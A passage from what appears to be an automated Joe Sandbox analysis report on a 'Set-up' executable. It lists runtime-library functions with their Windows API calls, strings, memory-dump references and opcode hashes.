                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 4d9e9c2852f67314d495ee577a11322d703f6018f57cd2d4715814aefe8978d9
                                                                                                                                  • Instruction ID: eaabc66574aff6e4a41198eae98d193df7ee643c4f283502ed67321c70d7d2de
                                                                                                                                  • Opcode Fuzzy Hash: 4d9e9c2852f67314d495ee577a11322d703f6018f57cd2d4715814aefe8978d9
                                                                                                                                  • Instruction Fuzzy Hash: 82F0C83060021CBBDB299F65D849BAEBFB8EF04715F0001B8F915A2254DF346994CB80
                                                                                                                                  Function 0111BBB9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0111BBD5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0111BBE5
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0111BC10
                                                                                                                                  Strings
                                                                                                                                  • Attempted a typeid of nullptr pointer!, xrefs: 0111BBCC
                                                                                                                                  • Bad read pointer - no RTTI data!, xrefs: 0111BC07
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::__non_rtti_object::__construct_from_string_literal$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: Attempted a typeid of nullptr pointer!$Bad read pointer - no RTTI data!
                                                                                                                                  • API String ID: 3530510960-4195314292
                                                                                                                                  • Opcode ID: 78a6c00a87536637a04bb505b8dbe0b883cd1a0e72120822ebfe23baab6dcb92
                                                                                                                                  • Instruction ID: d65b60894ad989fb61f8d3a42a0e6d121259aa1e7d3423d10772e5283b1e10d2
                                                                                                                                  • Opcode Fuzzy Hash: 78a6c00a87536637a04bb505b8dbe0b883cd1a0e72120822ebfe23baab6dcb92
                                                                                                                                  • Instruction Fuzzy Hash: 87F0BB766083096ED70CDBA5D685F8DF3F4AF14619F10406DE110D7154DBB0FE008658
                                                                                                                                  Function 00E4AB10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E4AB1D
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00E4AB24
                                                                                                                                  • wsprintfA.USER32 ref: 00E4AB3C
                                                                                                                                  Strings
                                                                                                                                  • Ensure check failed in module '%s', version %s, PID %u, TID %u, function '%s', line %u:%s, xrefs: 00E4AB36
                                                                                                                                  • 9.39, xrefs: 00E4AB2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThreadwsprintf
                                                                                                                                  • String ID: Ensure check failed in module '%s', version %s, PID %u, TID %u, function '%s', line %u:%s$9.39
                                                                                                                                  • API String ID: 2521638806-727602990
                                                                                                                                  • Opcode ID: b4330a5030a7623f5b42eabbfa3db9adf448ec4c1c177f272f1d083d46ff55a0
                                                                                                                                  • Instruction ID: 0323798a3b852230ebb36d3c3a143fa7a212deef18d8027940ff94465693700b
                                                                                                                                  • Opcode Fuzzy Hash: b4330a5030a7623f5b42eabbfa3db9adf448ec4c1c177f272f1d083d46ff55a0
                                                                                                                                  • Instruction Fuzzy Hash: 13E02232180104BFCF156F81EC48E8A7FA9FF08324B188468FA0896011C333F0A2CBA5
                                                                                                                                  Function 00E60EC4 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E60ED8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E60F17
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E619D9
                                                                                                                                    • Part of subcall function 00E5F1D0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E5F208
                                                                                                                                    • Part of subcall function 00E5F1D0: EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E5F23A
                                                                                                                                    • Part of subcall function 00E5F1D0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F275
                                                                                                                                    • Part of subcall function 00E5F1D0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F287
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter
                                                                                                                                  • String ID: %$:
                                                                                                                                  • API String ID: 2978645861-4129514765
                                                                                                                                  • Opcode ID: 23f8d1eae2ff008eb68f532856dc44cbdcf3bf05b0372b86f6c980fd4ccd31af
                                                                                                                                  • Instruction ID: c243d9d1823a8fbc0b5c770ef77837e9cc8c71e30d35278e4eecf1c8efc821c3
                                                                                                                                  • Opcode Fuzzy Hash: 23f8d1eae2ff008eb68f532856dc44cbdcf3bf05b0372b86f6c980fd4ccd31af
                                                                                                                                  • Instruction Fuzzy Hash: 98412770E45288CEDF26CBA4E4547EEBBB0AF52388F0810DDD455B7281DB705A48CB61
                                                                                                                                  Function 00E63F50 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E63F86
                                                                                                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00E63FB4
                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 00E64065
                                                                                                                                  • GetACP.KERNEL32 ref: 00E64071
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E64085
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCriticalSection$EnterEventsInputLeaveNumber
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4237849186-0
                                                                                                                                  • Opcode ID: 21379159a283692a1beef14f355db937b9b20fcfaf43b1ab10832c5aedd7a9f1
                                                                                                                                  • Instruction ID: 725a8cd9d15e892789420991564c821e766dbc59602ee005075d8e0780205c5f
                                                                                                                                  • Opcode Fuzzy Hash: 21379159a283692a1beef14f355db937b9b20fcfaf43b1ab10832c5aedd7a9f1
                                                                                                                                  • Instruction Fuzzy Hash: ED3145B0D882A49FDF34CB74A8087A9BBB99702374F041395D661B33C6C3300D488753
                                                                                                                                  Function 0112CB4C Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 0112CB64
                                                                                                                                    • Part of subcall function 01126F59: HeapFree.KERNEL32(00000000,00000000,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?), ref: 01126F6F
                                                                                                                                    • Part of subcall function 01126F59: GetLastError.KERNEL32(?,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?,?), ref: 01126F81
                                                                                                                                  • _free.LIBCMT ref: 0112CB76
                                                                                                                                  • _free.LIBCMT ref: 0112CB88
                                                                                                                                  • _free.LIBCMT ref: 0112CB9A
                                                                                                                                  • _free.LIBCMT ref: 0112CBAC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: c25af741ddb9691e94e7c78b3ea63d85f25e1b362bd3f7cfed1c15b2f6837c2d
                                                                                                                                  • Instruction ID: 26285d498247ab57b4b748cfd6b2144c0750a65ae9940fb3e916ac7e28550799
                                                                                                                                  • Opcode Fuzzy Hash: c25af741ddb9691e94e7c78b3ea63d85f25e1b362bd3f7cfed1c15b2f6837c2d
                                                                                                                                  • Instruction Fuzzy Hash: 10F068324185606FDA3CEA5CF4A4E0A7BDDAA00750794080AFF8DE7540C730FC909BA5
                                                                                                                                  Function 00E4A8C1 Relevance: 7.5, APIs: 5, Instructions: 25threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131ADFC,00000001,00000000), ref: 00E4A8D9
                                                                                                                                  • SwitchToThread.KERNEL32(?,00E4F9FE,460C02D8,?,?,?,01164AB5,000000FF), ref: 00E4A8E3
                                                                                                                                  • InitializeCriticalSection.KERNEL32(0131AE00), ref: 00E4A8F0
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADFC,00000002), ref: 00E4A8FD
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131AE00), ref: 00E4A911
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CompareEnterInitializeSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1619914552-0
                                                                                                                                  • Opcode ID: ffa375d4967baf9ce8dac3d3b2a6825134b6097153364745febdf5b17c3af8bb
                                                                                                                                  • Instruction ID: f5af3f480ce7d397c390be4271d542a43f6fe1333f26318b7d8b3ae5a156bde3
                                                                                                                                  • Opcode Fuzzy Hash: ffa375d4967baf9ce8dac3d3b2a6825134b6097153364745febdf5b17c3af8bb
                                                                                                                                  • Instruction Fuzzy Hash: 4DE09B31389340ABD63C1751796EB653735EB00727F480478F252E2148C77054DADB52
                                                                                                                                  Function 00E4A3C0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 367COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(0000000E,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,01217A7C,?,00000000,, function ',0000000C), ref: 00E4A7B7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E4A803
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskErrorLast
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 523316592-589021327
                                                                                                                                  • Opcode ID: fa6f14a4e0d73a22028b00a02551e18a23dec886ffcbd833629fd926b970e84b
                                                                                                                                  • Instruction ID: feabe837d3b52e500a3e6cb61b05da84d7b23a37c42a8b9af625d068dfa99a10
                                                                                                                                  • Opcode Fuzzy Hash: fa6f14a4e0d73a22028b00a02551e18a23dec886ffcbd833629fd926b970e84b
                                                                                                                                  • Instruction Fuzzy Hash: 63C13430E802199FDF24CF68E4856BDB7B1EF55324F0CA5BAE821FB241D6349942C756
                                                                                                                                  Function 00E6C090 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 312fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00E6C350
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,000000FF), ref: 00E6C3AB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,000000FF), ref: 00E6C400
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FileMove
                                                                                                                                  • String ID: MoveFileW()
                                                                                                                                  • API String ID: 2925174528-1661149990
                                                                                                                                  • Opcode ID: 1f9bee7a40651011b9416b1c87ed4a0fdf0a08273336c18cb23612941abb0816
                                                                                                                                  • Instruction ID: f597ca73397356432bc68ee7561b19539ea61b44f31631e60beb5561c7583794
                                                                                                                                  • Opcode Fuzzy Hash: 1f9bee7a40651011b9416b1c87ed4a0fdf0a08273336c18cb23612941abb0816
                                                                                                                                  • Instruction Fuzzy Hash: 0FD1BB70A042589FDF28CFA4D8A4BFEB7B4AF10388F5450E8E459AB681DB749F44CB51
                                                                                                                                  Function 00E4A030 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 282COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(0000000E,00000001,0131B724,?,?,0131B724,00000000,?,0131B724,00000000), ref: 00E4A360
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E4A3BA
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E4A3AE
                                                                                                                                  • basic_ncstring<char>::operator [], xrefs: 00E4A3A9
                                                                                                                                  Memory Dump Source
